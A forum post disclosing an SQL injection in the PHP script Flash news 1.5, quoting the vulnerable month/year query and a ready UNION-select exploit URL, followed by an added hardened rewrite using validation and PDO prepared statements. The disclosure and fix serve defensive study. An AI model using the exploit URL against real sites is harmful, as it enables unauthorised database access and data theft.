SQL-inj Flash news 1.5

Discussion in 'Web vulnerabilities' started by FriLL, 2 Sep 2009.

  1. FriLL

    FriLL Member

    Joined:
    14 Sep 2008
    Messages:
    90
    Likes Received:
    24
    Reputations:
    8
    Vulnerable code

    PHP:
    if ((isset($month)) && (isset($year)))
    {
        // Select from the database by month
        // $month and $year are interpolated into the query unescaped (the injection point)
        $mysql = "SELECT * FROM $tablename WHERE ((month=$month) AND (year=$year)) ORDER BY date DESC";
    }

    Exploit:
    out.php?month=09&year=1))-1+union+select+1,2,3,4,5,6+--+

    Field 6 is printable.
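    Added example (not from the original post or the Flash news 1.5 code): the same month/year lookup rewritten with input validation and a PDO prepared statement, so the values can no longer alter the query structure. The table name `news`, the `fetchNewsByMonth` function and the DSN/credentials are assumed placeholders.

```php
<?php
// Hardened version of the month/year query from the post (added example).
// Assumptions: PDO/MySQL, placeholder DSN and credentials, allow-listed table names.

function fetchNewsByMonth(PDO $pdo, string $tablename, $month, $year): array
{
    // Validate before the values reach SQL. ctype_digit accepts only 0-9 characters,
    // so a value like "1))-1 union select ..." is rejected outright; it also accepts
    // the zero-padded "09" used in the original URL, which (int) turns into 9.
    if (!ctype_digit((string) $month) || !ctype_digit((string) $year)) {
        throw new InvalidArgumentException('month and year must be unsigned integers');
    }
    $m = (int) $month;
    $y = (int) $year;
    if ($m < 1 || $m > 12 || $y < 1970 || $y > 2100) {
        throw new InvalidArgumentException('month/year out of range');
    }

    // Identifiers cannot be bound as parameters, so allow-list the table name
    // instead of interpolating it (hypothetical table names).
    $allowedTables = ['news' => true, 'archive' => true];
    if (!isset($allowedTables[$tablename])) {
        throw new InvalidArgumentException('unknown table');
    }

    // Placeholders keep data separate from SQL text: the driver sends $m and $y
    // as typed parameters, never re-parsing them as part of the statement.
    $sql = "SELECT * FROM `$tablename` WHERE month = :month AND year = :year ORDER BY date DESC";
    $stmt = $pdo->prepare($sql);
    $stmt->bindValue(':month', $m, PDO::PARAM_INT);
    $stmt->bindValue(':year', $y, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Usage with placeholder connection details.
$pdo = new PDO('mysql:host=localhost;dbname=flashnews;charset=utf8mb4', 'user', 'password', [
    PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
    PDO::ATTR_EMULATE_PREPARES => false, // use server-side prepared statements
]);
$rows = fetchNewsByMonth($pdo, 'news', $_GET['month'] ?? '', $_GET['year'] ?? '');
```

    With emulated prepares disabled, a UNION payload in `month` or `year` raises an exception at the validation step rather than reaching MySQL, which also gives a clean point to log the rejected request.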